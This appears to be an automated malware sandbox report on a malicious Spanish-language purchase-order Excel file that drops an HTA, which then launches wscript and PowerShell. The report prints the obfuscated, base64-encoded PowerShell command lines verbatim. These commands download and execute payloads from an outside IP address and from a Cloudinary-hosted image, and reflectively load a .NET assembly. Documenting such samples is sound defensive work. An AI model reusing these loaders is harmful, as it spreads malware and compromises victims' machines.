        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C36D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: powershell.exe, 00000007.00000002.444981624.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.508474117.0000000002171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.547256956.0000000002011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: powershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 0000000D.00000002.508474117.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.547256956.0000000002210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
        Source: powershell.exe, 0000001A.00000002.547256956.0000000002210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
        Source: powershell.exe, 0000000D.00000002.508474117.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.547256956.0000000002210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C36D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: mshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433647456.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/
        Source: mshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/3v
        Source: mshta.exe, 00000004.00000002.433647456.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/BK
        Source: mshta.exe, 00000010.00000002.489097499.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/I
        Source: mshta.exe, 00000010.00000002.489097499.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/ILE
        Source: mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/der
        Source: mshta.exe, 00000010.00000002.488961722.000000000041E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&ge
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
        Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Excel sheet contains many unusual embedded objects
        Source: Orden_de_Compra_Nmero_6782929219.xlsOLE: Microsoft Excel 2007+
        Source: Orden_de_Compra_Nmero_6782929219.xlsOLE: Microsoft Excel 2007+
        Source: 54330000.0.drOLE: Microsoft Excel 2007+
        Source: 54330000.0.drOLE: Microsoft Excel 2007+
        Microsoft Office drops suspicious files
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].htaJump to behavior
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcic